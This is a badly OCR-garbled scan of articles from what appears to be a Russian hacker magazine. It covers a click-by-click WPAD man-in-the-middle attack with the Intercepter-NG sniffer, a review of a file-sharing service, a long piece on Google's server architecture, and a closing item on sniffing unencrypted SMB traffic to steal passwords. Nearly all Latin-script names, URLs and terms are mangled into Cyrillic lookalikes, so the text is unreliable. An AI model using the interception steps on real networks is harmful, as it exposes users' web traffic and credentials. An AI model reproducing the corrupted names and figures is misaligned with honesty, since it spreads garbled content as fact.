известности. Почему? Можно выделить две причины. Во-первых, она 
позволяет перехватывать только веб-трафик клиента: получается, 
многим проще запустить АРР роізоп и перехватить гораздо больше. 

А во-вторых, для ее осуществления хоть и не требуется каких-то 




Активируем МіТМ-атаку с помощью ѴѴРАР одним кликом мыши. 
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фантастических манипуляций, но все же необходимо запустить и на- 
строить ряд сервисов: 

1. Необходимозарегистрироватьвсети имя «ѴѴРАО». 

2. Необходимо запустить веб-сервер и создать файл настроек 
«ѵѵрасЫаІ». 

3. Необходимозапуститьпрокси-сервер, который будетобслуживать 
перенаправленных жертв. 

Если на ІІпіх это проделывается достаточно быстро, то на 
ѴѴіпсіоѵѵб выполнение подобных операций требует больше времени 
и усилий, в том числе для установки дополнительного софта. Вдоба- 
вок возникает проблема с переименованием в сети. Довольно подо- 
зрительно будет выглядеть компьютер с именем «ѴѴРАО» в сетевом 
окружении, а если захочется применить инструмент вроде пЫооІ для 
того, чтобы скрытно отвечать на запросы от имени «ѴѴРАО», то при- 
дется остановить ІМеіВЮЗ N5 — службу ѴѴіпсіоѵѵб для освобождения 
порта 137 ІЮР — и, соответственно, отключиться от сети, потому что 
все подобные утилиты для работы используют сокеты. 

РЕАЛИЗАЦИЯ АТАКИ В ІІМТЕРСЕРТЕР-М6 

Именно мнимая сложность и отсутствие автоматизированных 
инструментов, реализующих данную атаку, являются причиной 
ее малой известности и распространенности. В Іпіегсеріег-Ыб 
( Шр://5піИ.5и ) проведение атаки на ѴѴРАО полностью автоматизи- 
ровано и проходитза несколько секунд. Благодаря использова- 
нию драйвера ѴѴіпРсар нет нужды прослушивать сокеты или пе- 
реименовывать собственное І\ІеіВІ05-имя. Указывать конкретных 
жертв не требуется, потому что выдача конфигурации происходит 
всем запросившим. На выбор можно вручную указать прокси- 
сервер, который будет выдаваться клиентам, или использовать 
50СК5-сервер, встроенный в сам снифер. В последнем случае 
для перехвата трафика кроме ІпІегсерІег-ІМб больше ничего не 
требуется. В общем случае атака состоит из трех простых шагов: 

1. Запускаем снифер и выбираем интерфейс для снифинга. 

2. Включаем встроенный 50СК5-сервер, который будетиспользо- 
ваться для обслуживания перенаправленныхжертв, — для этого 
кликаем на иконкунастроекиактивируемопцию«ВиіІЫп50СК5». 

3. Нажимаем на кнопку«І\ІАТМосІе», чтобы включить встроенный 
ІМАТ. Важно в группе «МіТМ орііопз» включить опцию «ѴѴРАО 
МіТМ», после чего кликаем на кнопку «5іагі/5іор ІМАТ». В логе 
должно появиться примерно следующее: 

ІМАТ 5І:аг1:іп§. . . 

ТбпеасІ 011 Т БіагіесІ . . . 

МіТМ оп 80 БіагіесІ . . . 

МіТМ оп 61111 БіагіесІ. . . 

ТбгеасІ ІІРРАТЕ БіагіесІ . . . 
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Перехваченный снифером трафик 



ТбгеасІ ІИ БіагіесІ . . . 

ІлІРАй ТбгеасІ Біагііесі . . . 

Как только кто-то запросит настройки прокси, ІпІегсерІег-ІМС 
перенаправит веб-трафик на себя, и ты сможешь увидеть перехва- 
ченные данные! 

Стоит заметить, что данная атака (в отличие от того же АВР 
роізоп) абсолютно безвредна для жертв. Даже если что-то пойдет 
не так с веб-сервером, содержащим конфигурационный файл 
ѵѵрасЫаІ или нашим прокси-сервером, никаких сбоев в работе 
веб-приложения не случится: он просто проигнорирует автомати- 
ческое получение настроек и продолжит обращаться к ресурсам 
напрямую. Самой большой проблемой, связанной с безопасностью 
ѴѴРАО, является использование данного протокола в Іпіегпеі 
Ехріогег по умолчанию. Это значит, что Сбготе и, очевидно, другие 
браузеры или иные приложения (которые используют сетевые 
настройки из ІЕ) подвержены этой атаке. Поэтому в любой сети 
найдется как минимум несколько жертв, которых можно перехва- 
тить легко и непринужденно. Применять эту технику можно в тех 
случаях, когда отравление АРР-кеша невозможно (используются 
статичные записи) или требуется перехватить только веб-трафик, 
не создавая лишнего шума в сети. ПЕ 



ВКУСНОСТИ ІЫТЕКСЕРТЕК-ЫО 



С момента публикации статьи «Снифер + МІТМ-атаки = 
0х4553-Іп*егсер*ег» произошли кардинальные изменения как 
в названии и внешнем виде, так и в функционале. Наконец-то 
появилась возможность ресайзить окно программы по всем 
направлениям. Основная конфигурация перенесена в раздел 
опций. Появился отдельный режим сканирования, в котором 
быстро и легко можно просканировать всю сеть и получить 
дополнительную информацию об ІР-адресах, производителе 
сетевой карты, используемой операционной системе (на основе 
значения ТТІ_), а также определить адрес шлюза и валидное 
значение для параметра Біеабб ІР, который требуется при 
реализации большинства МіТМ-атак. ІМАТ перенесен из 



отдельного приложения в сам Іп*егсер*ег и теперь является 
разделом с МіТМ-атаками. Полностью переработан режим Раѵѵ 
Мосіе, теперь он визуально напоминает самый мощный сетевой 
анализатор ѴѴігезбагк и хотя функционально намного проще, 
вполне справляется со своей основной задачей. Режим анализа 
сообщений месенджеров представляет собой сетку, в которой 
можно осуществлять сортировку по полю Ш. Сохранить 
награбленные данные можно не только в виде текста, но и в 
виде НТМІ_-страницы, в более удобной и читабельной форме. 

В следующих версиях планируется реализация очень вкусных 
функций, поэтому следи за обновлениями на официальном 
сайте бпіН.бц . 



ѴѴАІМШС 



Информация 
представлена 
в ознакомительных 
целях. Ни автор, ни 
редакция не несут 
ответственности за 
любой возможный 
вред, причиненный 
материалами данной 
статьи. 
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РС20ЫЕ 



Мария «МИгіІІ» Нефедова (тіІИІІІсІгеаІ. хакер. ги) 



Неограниченный 

файлообмен 




ПЯТЬ 

ФИШЕК 

СЕРВИСА 

ѴѴІКЕОѴЕК 




ѴѴігеОѵег 



Упіітііесі Рііе $епсііпд ?ог Ргее 




В ответ на выпады 
антипиратов в Сети 
появляются все новые и более 
совершенные и хитрые 
технологии и сервисы для 
обмена файлами. Один 
из них — геОѵегсот . 

Сервис начал свою работу 
совсем недавно и пока 
функционирует в режиме 
бета-теста. Главная страница 
сайта предлагает встать 
в очередь за приглашением 
и кратко рассказывает об 
основных особенностях 
сервиса. Тем не менее, 
ѴѴігеОѵегуже успел привлечь 
к себе вполне заслуженное 
внимание пользователей 
и СМИ. Каким образом? 

Дело в том, что можно не 
дожидаться инвайта в бету: 
клиент ѴѴігеОѵег доступен по 
адресу боѵѵпіоасілл/ігеоѵег.сот 
и сервис можно опробовать 
хоть сейчас. Что мы и сделали 
:) . Итак, чем же примечателен 
ѴѴігеОѵег? 



РЕГИСТРАЦИЯ НЕНУЖНА 



Начнем с того, что ѴѴігеОѵег работает сходным образом с йгорбох. Потребуется лишь 
установить десктоп ный клиент, указать и подтвердить свой е-таіі. Все. Никакой дальнейшей 
регистрации и выбора пароля не потребуется. Можно начинать работу, забыв о рекламных бан- 
нерах (привет, «РапидаШара»!), ожидании начала загрузки и прочих ужасах. Разумеется, сервис 
абсолютно бесплатен. 



МЕСТО НЕ ОГРАНИЧЕНО 



Место в ѴѴігеОѵег предоставляется для любого количества файлов. Размер передаваемых 
файлов также не ограничен и может составлять даже гигабайты. Возможно, правильнее будет 
сказать — «пока не ограничен», все же проект очень молод, но мы не будем раньше времени 
сгущать краски. Поддерживается докачка в случае обрыва связи. Скорость, по сути, ограничена 
только скоростью твоего канала доступа в интернет. 



ДЕСКТОПНЫИ КЛИЕНТ 

Клиент ѴѴігеОѵег пока существует только под ѴѴіпсІоѵѵз, но мы полагаем, что очень скоро 
появятся версии и для других популярных ОС. Все действия с программой предельно просты — 
достаточно указать адрес получателя файла и перетянуть нужный файл (файлы) в окно про- 
граммы. ѴѴігеОѵег отобразит информацию об общем количестве файлов, их суммарном объеме, 
и закачка автоматически стартует в фоновом режиме. После этого про файлы можно забыть 
— остальное будет проделано без вашего участия. Программа закончит отсылку файла в облако, 
после чего сгенерирует и отправит получателю ссылку на него. ѴѴігеОѵег также уведомит пользо- 
вателя о том, что получатель начал скачивание, и о том, когда он его закончит. 



Р2Р 



Одна из главных особенностей ѴѴігеОѵег заключается в том, что это облачный сервис 
и реализован он как сеть Р2Р. ѴѴігеОѵег не индексируется, что для многих пользователей может 
быть важно. Полученную ссылку на файл в ѴѴігеОѵег можно выложить в открытый доступ, и файл 
будет доступен для всех желающих. Однако создатели сервиса побеспокоились и о возможных 
проблемах. При большом количестве трафика такую несанкционированную раздачу быстро за- 
блокируют. В будущем планируется реализовать функцию «заказа файлов». Можно будет отпра- 
вить на указанный е-таіі письмо с просьбой передать определенный файл. Получателю письма 
придет ссылка, по которой он сможет закачать файл в облако, а после человек, разместивший 
запрос, получит ссылку на скачивание данного файла. 



РРІѴАСУ 



Для тех, кто хочет передать зашифрованный файл, предусмотрена такая возможность 
(за единовременную плату в пять долларов). Также за дополнительную плату в десять долларов 
в месяц предоставляется доступ в облако по защищенному каналу — достаточно проапгрейдить 
свой аккаунт до профессионального. В таком случае заработает фишка «ТшзЫМо-Опе Весигііу», 
и создатели сервиса утверждают, что при этом даже они не будут иметь возможности «увидеть» 
файлы пользователя. ПС 
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РС20ЫЕ 



Иван Блинков (ѵѵѵѵѵѵ.іпзідІіЫіги] 




АРХИТЕКТУРНЫЕ 

УХИЩРЕНИЯ 

ПОИСКОВОГО 

ГИГАНТА 



Ни одним другим сайтом в мире не пользуется столько 
людей — больше половины всей аудитории интернета. Речь, 
конечно же, идет о боодіе. Эта огромная интернет-компания 
задает общий вектор развития интернета. О том, как она 
справляется с таким огромным потоком трафика и запросов, 
мы сегодня и поговорим. 



се продукты боодіе основываются на 
постоянно развивающейся программ- 
ной платформе, которая спроектиро- 
учетом работы на миллионах серверов, 
находящихся в разных дата-центрах по всему 
миру. В отличие от большинства интернет- 
компаний, которые занимаются лишь одним 
продуктом (проектом), архитектура боодіе 
не может быть представлена как единое 
конкретное техническое решение. Сегодня мы 
скорее будем рассматривать общую стратегию 
технической реализации интернет-проектов 
в боодіе, возможно слегка затрагивая и другие 
аспекты ведения бизнеса в интернете. Тут 
сразу хочу сделать оговорку. Автор является 
независимым специалистом по архитектуре 
высоконагруженных интернет-проектов и ни- 
какого прямого отношения к боодіе не имеет. 
Представленная информация по крупицам 
собрана из видеодокладов, презентаций, отче- 
тов и статей сотрудников поискового гиганта. 



ОБОРУДОВАНИЕ 

Обеспечение работы миллиона серверов и рас- 
ширение их парка — одна из ключевых статей 
расходов боодіе. Чтобы сократить эти издержки 
до минимума, компания стремится наиболее 
эффективно использовать серверное, сетевое 
и инфраструктурное оборудование. В традици- 
онных дата-центрах потребление электричества 
серверами примерно равно его потреблению 
остальной инфраструктурой (кондиционерами, 
маршрутизаторами, коммутаторами, видео- 
наблюдением и прочим) — боодіе же удалось 
снизить в три с половиной раза расход до- 
полнительной электроэнергии. Таким образом, 
суммарное энергопотребление дата-центром 
боодіе сравнимо с потреблением только сер- 
веров в типичном дата-центре и вдвое меньше 
его общего энергопотребления. Чтобы добиться 
такого результата, команде приходится еже- 
дневно точно измерять, сколько электроэнергии 
потребляет каждый компонент. Это позволяет 



определить, где еще можно уменьшить ее рас- 
ход. При проектировании дата-центра уделя- 
ется внимание даже незначительным деталям, 
позволяющим сэкономить, пусть и немного, — 
при таком масштабе это окупается. 

В боодіе разработан ряд технологий для 
охлаждения дата-центров практически без 
кондиционеров, с использованием воды и ее 
испарения. Например, в 2009 году боодіе 
приобрел фабрику по производству бумаги 
в городе Хамина на берегу Финского залива 
и переоборудовал ее в дата-центр с охлаж- 
дением серверного оборудования с помощью 
морской воды (вода была подведена к зданию 
еще в 50-х годах для нужд фабрики). 

В поисковом гиганте активно пропаганди- 
руют максимальное использование возоб- 
новляемой энергии. Для этого заключаются 
долгосрочные соглашения с ее поставщиками 
(на двадцать и более лет), что позволяет 
отрасли активно развиваться и наращивать 
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Как устроен боодіе 




боодіе активно использует восполняемую энергию 



Дата-центр Соодіе в Оклахоме 




мощности. Проекты по генерации возобнов- 
ляемой энергии, спонсируемые Соодіе, имеют 
суммарную мощность более 1,7 гигаватт, что 
существенно больше, чем используется для 
работы Соодіе. Этой мощности хватило бы для 
обеспечения электричеством 350 тысяч домов. 

Компания известна за свои эксперименты 
и необычные решения в области серверного 
оборудования и инфраструктуры. Некоторые 
запатентованы; какие-то прижились, какие-то 
— нет. Подробно останавливаться на них не 
буду, лишь назову некоторые: 

• резервное питание, интегрированное в блок 
питания сервера, обеспеченное стандарт- 
ными 12Ѵбатарейками; 

• «серверный сэндвич», где материнские 
платы расположены сдвух сторон водяной 
системы теплоотвода в центре стойки; 

• дата-центр из контейнеров. 

В заключение этого раздела хотелось бы 
взглянуть правде в глаза: идеального обо- 
рудования не бывает. У любого современного 
устройства, будь то сервер, коммутатор или 
маршрутизатор, есть вполне реальный шанс 
прийти в негодность из-за производственного 
брака или каких-либо внешних факторов. Если 
умножить этот, казалось бы, небольшой шанс на 
количество оборудования, которое использует- 
ся в Соодіе, то окажется, что чуть ли не каждую 



600ѲІ.Е+ 



• Более 40 миллионов пользователей за три 
месяца 

• 25 миллионов пользователей за первый 
месяц 

• 70:30 примерное соотношение мужчин 
и женщин 

• Себестоимость разработки больше 
полумиллиарда долларов 



минуту из строя выходит одно или несколько 
устройств в системе. На оборудование по- 
лагаться нельзя, поэтому вопрос отказоустой- 
чивости переносится на плечи программной 
платформы, которую мы сейчас и рассмотрим. 

ПЛАТФОРМА 

В Соодіе очень рано столкнулись с проблемой 
ненадежности оборудования и трудностями, 
возникающими при работе с огромными масси- 
вами данных. Программная платформа, спро- 
ектированная для работы на многих недорогих 
серверах, позволила им абстрагироваться от 
сбоев и ограничений одного сервера. Основны- 
ми задачами в ранние годы была минимизация 
точек отказа и обработка больших объемов 
слабоструктурированных данных. Их решени- 
ем стали три основных слоя платформы Соодіе, 
работающие один поверх другого: 

1. Соодіе РіІеБузІет (СР5) — распределенная 
файловая система, состоящая из сервера 

с метаданными и теоретически неограни- 
ченного количества серверов, хранящих 
произвольные да иные в блоках фиксиро- 
ванного размера. 

2. ВідТаЫе — распределенная база данных, 
использующая для доступа к да иным две 
произвольных байтовых строки -ключа (обо- 
значающие строку и столбец) и дату/время 
(обеспечивающие версионность). 



ЦИФРЫ 

• Ежедневная аудитория Соодіе составляет 
около миллиарда человек 

• Используется более 900 тысяч серверов 

• 12 основных дата-центров в США, 
присутствие в большом количестве точек по 
всему миру (более 38) 

• Около 32 тысяч сотрудников в 76 офисах по 
всему миру 



3. МарРесІисе — механизм распределен- 
ной обработки больших объемов данных, 
оперирующий парами ключ — значениедля 
получениятребуемой информации. 

Такая комбинация, дополненная другими 
технологиями, довольно долгое время по- 
зволяла справляться с индексацией интернета, 
пока скорость появления информации в нем не 
начала расти огромными темпами из-за «бума 
социальных сетей». Информация, добавленная 
в индекс, даже через полчаса уже зачастую 
становиласьустаревшей. В дополнение кэтому 
в рамках самого Соодіе стало появляться все 
больше продуктов, предназначенных для рабо- 
ты в реальном времени. 

Спроектированные сучетом совершенно 
другихтребований интернета пятилетней 
давности компоненты, составляющие ядро 
платформы Соодіе, потребовали фундаменталь- 
ной смены архитектуры индексации и поиска. 
Около года назад публике была представлена 
новая система индексирования под кодовым 
названием Соодіе СаИеіпе. Новые, перерабо- 
танные версии старых «слоев» также окрести- 
ли броскими именами, но резонанса у техниче- 
ской публики они вызвали намного меньше, чем 
новый поисковый алгоритм в 5Е0-индустрии. 

ТЕХНОЛОГИЯ 6006І_Е С0Ю551І5 

Новая архитектура СР5 была спроектирова- 
на для минимизации задержек при доступе 
к данным (что критично для приложений вроде 
СМаіІ и ѴоиТиЬе), не в ущерб основным свой- 
ствам старой версии — отказоустойчивости 
и прозрачной масштабируемости. 

В оригинальной реализации упор был 
сделан на повышение общей пропускной спо- 
собности: операции объединялись в очереди 
и выполнялись разом, при таком подходе можно 
было прождать пару секунд еще до того, как 
первая операция в очереди начнет выпол- 
няться. Помимо этого в старой версии было 
большое слабое место в виде единственного 
мастер-сервера с метаданными, сбой в котором 
грозил недоступностью всей файловой системы 
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РС20ЫЕ 



ТИПИЧНЫЙ ПЕРВЫЙ ГОД КЛАСТЕРА В 6006І.Е 

• —1/2 перегрева (большинство серверов выключаются в течение 5 минут, на восстановление 
уходит 1-2 дня) 

• ~1 отказ распределителя питания (-500-1000 резко пропадают, -6 часов на восстановление) 

• -1 передвижение стойки (много передвижений, 500-1000 машин, 6 часов) 

• -1 перепрокладка сети (последовательной отключение -5% серверов на протяжении 2 дней) 

• -20 отказов стоек (40-80 машин мгновенно исчезают, 1-6 часов на восстановление) 

• -5 стоек становится нестабильными (40-80 машин сталкиваются с 50% потерей пакетов) 

• -8 запланированных технических работ с сетью (при четырех могут случаться случайные 
получасовые потери соединения) 

• -12 перезагрузок маршрутизаторов (потеря ОМБ и внешних виртуальных ІР на несколько минут) 

• -3 сбоя маршрутизаторов (восстановление в течение часа) 

• Десятки небольших 30-секундных пропаданий РЫБ 

• -1000 сбоев конкретных серверов (-3 в день) 

• Много тысяч сбоев жестких дисков, проблем с памятью, ошибок конфигурации и т.п. 



в течение небольшого промежутка времени 
(пока другой сервер не подхватит его функции 
— изначально это занимало около пяти минут, 
в последних версиях около десяти секунд). Это 
также было вполне допустимо при отсутствии 
требования работы в реальном времени, но для 
приложений, напрямую взаимодействующих 
с пользователями, было неприемлемо сточки 
зрения возможных задержек. 

Основным нововведением в Соіоззиз стали 
распределенные мастер-сервера, что позволи- 
ло не только избавиться от единственной точ- 
ки отказа, но и существенно уменьшить размер 
одного блока с данными (с 64 до 1 мегабайта), 
что в целом очень положительно сказалось на 
работе с небольшими объемами данных. В ка- 
честве бонуса исчез теоретический предел 
количества файлов в одной системе. 

Детали распределения ответственности 
между мастер-серверами, сценариев реакции 
на сбои, а также сравнение по задержкам 
и пропускной способности обеих версий, 
к сожалению, по-прежнему конфиденциаль- 
ны. Могу предположить, что используется 
вариация на тему хеш -кольца с репликацией 
метаданных на трех (?) мастер-серверах, с соз- 
данием дополнительной копии на следующем 
по кругу сервере в случае в случае сбоев, 
но это лишь догадки. По прогнозам боодіе, 
текущий вариант реализации распределенной 
файловой системы «уйдет на пенсию» в 2014 
году из-за популяризации твердотельных на- 
копителей и существенного скачка в области 
вычислительных технологий (процессоров). 

ПОДХОД 6006І_Е РЕРС01_АТ0Р 

МарРесІисе отлично справлялся с задачей 
полной перестройки поискового индекса, но 
не предусматривал небольшие изменения, за- 
трагивающие лишь часть страниц. Из-за пото- 
ковой, последовательной природы МарРесІисе 
для внесения изменений в небольшую часть 
документов все равно пришлось бы обнов- 
лять весь индекс, поскольку новые страницы 
непременно будут как-то связаны со старыми. 
Таким образом, задержка между появлением 
страницы в интернете и в поисковом индексе 
при использовании МарРесІисе была пропор- 
циональна общему размеру индекса (а значит, 
и интернета, который постоянно растет), а не 
размеру набора измененных документов. 

Ключевые архитектурные решения, 
лежащие в основе МарРесІисе, не позволяли 




Система охлаждения морской водой в дата-центре боодіе 



повлиять на эту особенность, и в итоге система 
индексации была построена заново с нуля 
(МарРесІисе продолжает использоваться в дру- 
гих проектах Соодіе для аналитики и прочих 
задач, по-прежнему не связанных с реальным 
временем). Новая система получила довольно 
своеобразное название Регсоіаіог. Попытки 
узнать, что оно значит, приводят к различным 
устройствам по фильтрации дыма, кофеваркам 
и не пойми чему еще. Но наиболее адекватное 
объяснение мне пришло в голову, когда я про- 
читал его по слогам: рег соі — по колонкам. 

Регсоіаіог представляет собой надстрой- 
ку над ВідТаЫе, позволяющую выполнять 
комплексные вычисления на основе имею- 
щихся данных, затрагивающие много строк 
и даже таблиц одновременно (в стандартном 
АРІ ВідТаЫе это не было предусмотрено). 
Веб-документы или любые другие данные 
изменяются/добавляются в систему по- 
средством модифицированного АРІ ВідТаЫе, 
а дальнейшие изменения в остальной базе 
осуществляются посредством механизма 
обозревателей. Если говорить в терминах 
реляционных СУБД, то обозреватели — что-то 
среднее между триггерами и хранимыми про- 
цедурами. Обозреватели представляют собой 
подключаемый к базе данных код (на С++), 
который исполняется в случае возникновении 
изменений в определенных колонках ВідТаЫе 
(откуда, видимо, и пошло название). Все 



ФИНАНСЫ 



• Выручка около 36 миллиардов долларов 
в год 

• Прибыль после налогов около 
10 миллиардов долларов в год 

• Капитализация около 200 миллиардов 
долларов 



используемые системой метаданные также 
хранятся в специальных колонках ВідТаЫе. 

При использовании Регсоіаіог все изменения 
происходят в транзакциях, удовлетворяющих 
принципу АСЮ (атомарность, целостность, 
изоляция и долговечность), каждая из которых 
затрагивает именно те сервера в кластере, 
на которых необходимо внести изменения. 
Механизм транзакций на основе ВідТаЫе раз- 
рабатывался в рамках отдельного проекта под 
названием Соодіе Медазіоге. 

Таким образом, при добавлении ново- 
го документа (или его версии) в поисковый 
индекс вызывается цепная реакция изменений 
в старых документах, скорее всего ограничен- 
ная по своей рекурсивности. Эта система при 
осуществлении случайного доступа поддержи- 
вает индекс в актуальном состоянии. 

В качестве бонуса в этой схеме удалось 
избежать еще двух недостатков МарРесІисе: 
проблемы «отстающих» и неравномерной на- 
грузки. Проблема «отстающих» заключается 
в том, что, когда один из серверов (или одна из 
конкретных подзадач) оказывался существен- 
но медленнее остальных, это также значи- 
тельно задерживало общее время завершения 
работы кластера. 

МарРесІисе не является непрерывным 
процессом, а разделяется на работы с ограни- 
ченной целью и временем исполнения. Таким 
образом, кроме того что нуждается в ручной 
настройке работ и их типов, кластер имеет 
очевидные периоды простоя и пиковой на- 
грузки, что ведет к неэффективному использо- 
ванию вычислительных ресурсов. 

Однако все это оказалось не бесплатно: при 
переходе на новую систему удалось достичь 
той же скорости индексации, но при этом ис- 
пользовалось вдвое больше вычислительных 
ресурсов. Производительность Регсоіаіог 
находится где-то между производительностью 
МарРесІисе и производительностью традици- 
онных СУБД. Так как Регсоіаіог не является 
распределенной системой, для обработки фик- 
сированного небольшого количества данных ей 
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Как устроен боодіе 



УОІІТІІВЕ ПОИСК 



• 4 миллиарда просмотров страниц вдень 

• 60 часов видео загружается каждую минуту 

• На февраль 2012 года в США, по данным сотЗсоге: 

• 147,4 миллиона уникальных зрителей 

• 16,7 миллиарда просмотров видео (в октябре 2011 было больше 20 
миллиардов) 

• Каждый зритель посмотрел в среднем 7 часов видео за месяц 

• 1,1 миллиарда просмотров видеорекламы, суммарной 
длительностью в 10,8 миллиона часов 

• Несколько тысяч полнометражных фильмов в ѴоиТиЬе Моѵіез 

• Более 10% всего видео в формате НО 

• 13% просмотров происходит с мобильных устройств 

• До сих пор работает в убыток, лишь 14% просмотров видео приносят 
выручку с рекламы 



• За последние 14 лет среднее время обработки одного поискового 
запроса уменьшилось с 3 секунд до менее 100 миллисекунд, то есть 
в 30 раз 

• Более 40 миллиардов страниц в индексе: если приравнять каждую 
к листу А4, они бы покрыли территорию США в пять слоев 

• Более квинтиллиона уникальных ІІРІ_ (10 в 18 степени): если 
распечатать их в одну строку, ее длина составит 51 миллион 
километров — треть расстояния от Земли до Солнца 

• В интернете встречается примерно 100 квинтиллионов слов: чтобы 
набрать их на клавиатуре, одному человеку потребовалось бы 
примерно 5 миллионов лет 

• Проиндексировано более 1,5 миллиарда изображений: чтобы их 
сохранить, потребовалось бы 112 миллионов дискет, которые можно 
сложить в стопку высотой 391 километр 



приходится использовать существенно больше 
ресурсов, чем традиционной СУБД; такова цена 
масштабируемости. По сравнению с МарНесІисе 
также пришлось платить дополнительными 
потребляемыми вычислительными ресурсами 
за возможность случайного доступа с низкой 
задержкой. Тем не менее, при выбранной ар- 
хитектуре боодіе удалось достичь практически 
линейного масштабирования при увеличении 
вычислительных мощностей на много поряд- 
ков. Дополнительные накладные расходы, свя- 
занные с распределенной природой решения, 
в некоторых случаях до тридцати раз превос- 
ходят аналогичный показатель традиционных 
СУБД, но у данной системы есть солидный 
простор для оптимизации в этом направлении, 
чем боодіе активно и занимается. 

МЕХАНИЗМ 6006І_Е БРАКЕР 

Браппег представляет собой единую систему 
автоматического управления ресурсами всего 
парка серверов боодіе. Проект грандиозный 
и даже планировался из расчета на 1 — 10 
миллионов серверов и примерно 1000 петабайт 
данных, расположенных в 100 — 1000 дата- 
центрах по всему миру и доступных миллиарду 
клиентских машин. По сути, это единое для 
всего боодіе пространство имен, по структуре 
похожее на иерархию каталогов, не зависящую 
от физического расположения данных. Про- 
дукты, которые будут строиться на его основе, 
смогут просто указывать высокоуровневые 
требования, например: «99% задержек при 
доступе к этим данным должны быть до 50 мс; 
расположи эти данные на как минимум двух 
жестких дисках в Европе, двух в США и одном 
в Азии». Все остальное система возьмет на 
себя, включая репликацию и отказоустойчи- 
вость. Возможно, аналогичным образом будет 
предоставлен прозрачный доступ не только 
к хранению данных, но и к использованию вы- 
числительных мощностей единого кластера. 

К сожалению, об этом проекте боодіе 
известно очень мало, официально он был 
представлен публике лишь однажды в 2009 



году, с тех пор иногда упоминался сотрудника- 
ми без особой конкретики. Точно неизвестно, 
развернута ли эта система на сегодняшний 
день и если да, то в какой части дата-центров, 
а также каков статус реализации заявленного 
функционала. 

ПРОЧИЕ КОМПОНЕНТЫ ПЛАТФОРМЫ 

Платформа боодіе в конечном итоге сводится 
к набору сетевых сервисов и библиотек для 
доступа к ним из различных языков програм- 
мирования (в основном используются С/С++, 
Эаѵа, РуіЬоп и РегІ). Каждый продукт, раз- 
рабатываемый боодіе, в большинстве случаев 
использует эти библиотеки для осуществления 
доступа кданным, выполнения комплексных 
вычислений и других задач, вместо стандарт- 
ных механизмов, предоставляемых операци- 
онной системой, языком программирования 
или орепзоигсе-библиотеками. Описанные 
проекты составляют лишь основу платформы 
боодіе, хотя она включает в себя куда больше 
готовых решений и библиотек. Несколько при- 
меров из публично доступных проектов: 

• 6ѴѴТ ( гіеѵеІорегз.доодІе.сот/ѵѵеЬ-ІооІкіі ) — 
система для реализации пользовательских 
интерфейсов веб-приложений на Эаѵа; 

• СІозиге Тооіз ( сіеѵеіорегз.доодіе.сот/ 
сіозиге ) — набор инструментов для работы 
с ЭаѵаБсгірІ; 

• І_еѵеЮВ І сосІе.доодІе.сот/р/ІеѵеІсІЬ ) — встра- 
иваемая высокопроизводительная СУБД; 

• Ргоіосоі Ви^егз ( сосіе.доодіе.сот/р/ 

ргоіоЬиЛ — не зависящий от языка програм- 
мирования и платформы формат бинарной 
сериализации структурированных данных, 
используется при взаимодействии большин- 
ства компонентов системы внутри боодіе; 

• Бпарру ( сосіе.аооаіе.сот/р/зпаррѵ ) — быстрая 
компрессия данных, используется при хране- 
нии данных в 6Р5. 

ПОДВОДИМ итоги 

боодіе задает вектор развития всей интернет- 
индустрии: именно эта компания диктует моду 



среди технологических проектов. На основе 
научных отчетов боодіе основываются многие 
успешные орепзоигсе-проекты, а любая опу- 
бликованная часть их технологического стека 
никогда не остается незамеченной. В то время 
как большинство компаний стараются приспо- 
собить существующие технологии для реше- 
ния своих типичных задач, боодіе сталкивает- 
ся с по-настоящему уникальными нагрузками 
и бизнес-задачами. Это подталкивает их быть 
впереди всего остального мира с технической 
точки зрения и создавать уникальные решения 
уникальных проблем и задач. 

Что из этого можно вынести для себя? 
Стабильные, проработанные и повторно ис- 
пользуемые базовые компоненты проекта 
— залог стремительного развития, а также 
создания новых проектов на той же кодовой 
базе. Если задачи и обстоятельства, с учетом 
которых проектировалась система, суще- 
ственно изменились — не бойся вернуться на 
стадию проектирования и реализовать новое 
решение. Используй инструменты, подходящие 
для решения каждой конкретной задачи, а не 
те, которые навязывает мода или привычки 
участников команды. Даже, казалось бы, не- 
значительные недоработки и допущения на 
большом масштабе могут вылиться в огромные 
потери — уделяй максимум внимания деталям 
при реализации проекта. Нельзя полагаться 
даже на очень дорогое оборудование — все 
ключевые сервисы должны работать минимум 
на двух серверах, в том числе и базы данных. 
Распределенная платформа, общая для всех 
проектов, позволит новым разработчикам легко 
вливаться в работу над конкретными продукта- 
ми, с минимумом представления о внутренней 
архитектуре компонентов платформы. 

Прозрачная работа приложений в несколь- 
ких дата-центрах — одна из самыхтяжелых 
задач, с которыми сталкиваются интернет- 
компании. Сегодня каждая из них решает ее 
по-своему и держит подробности в секрете, 
что сильно замедляет развитие орепзоигсе- 
решений. Ш 
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ВЗЛОМ/ ЕА5ѴНАСК 



Алексей «бгеепйод» Тюрин, ОідііаІ Бесигііу (іѵѵіНег.сот/апІуигіп) 




ЗАДАЧА 



РЕШЕНИЕ 

В прошлом номере ты узнал про трик с СРР, когда, имея пользо- 
вательский доступ к домену, можно было прочитать файл политик 
на контроллере и вынуть из него пароль от привилегированной 
учетки. На самом деле ситуация может быть еще проще и домен- 
ный доступ нам не потребуется. Все дело в том, что 5МВ-протокол, 
который используется для передачи файлов и межпроцессного 
взаимодействия (ІРС) в винде, не шифрует передаваемые данные. 
То есть в случае с СРР нам потребовалось бы проснифать трафик, 
передаваемый между контроллером домена и пользователем, 
а потом в офлайне расшифровать пароль и попасть в ОС. 

Еще раз повторю, что в 5МВ (как в версии 1, так и в версии 2) от- 
сутствует поддержка шифрования. Зато есть поддержка цифровых 
подписей, которая, между прочим, хорошо работает, защищая 
хосты оттакой страшной вещи, как ЗМВРеІау. Жаль, что включена 
она по умолчанию только на контроллере домена (подключения без 
подписи запрещены). Однако пример с ОРР во многом натянут. Куда 
более распространенная практика — это «удаленный» запуск ПО. 
Повесят на какой-нибудь шаре бухгалтерскую программу, напри- 
мер, и ярлычок кинут на рабочий стол. И вроде все неплохо, но при 




входе пользователя ПО читает файл с логином и паролем, а затем 
коннектится к базе (такой алгоритм работы очень распространен). 
А злые дяди прослушали трафик и получили доступ к СУБД. При- 
чем для этого им потребовался только ѴѴігевЬагк и пара кликов 
мыши: «Меню Рііе -> Ехрогі -> О Ь ) е с 1 5 -> 5МВ», далее выбираем 
файл и сохраняем его куда-нибудь. 
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ЕА5У НАСК 



ПРОСЛУШАТЬ ТРАФИК НА ЮОРВАСК-ИНТЕРФЕЙСЕ 
П0ДѴШ00ѴѴ5 



ЗАДАЧА 



РЕШЕНИЕ 

Очень часто бываеттак, что ты заинтересовался какой-то работаю- 
щей по Сети программой и тебе надо посмотреть, как именно она 
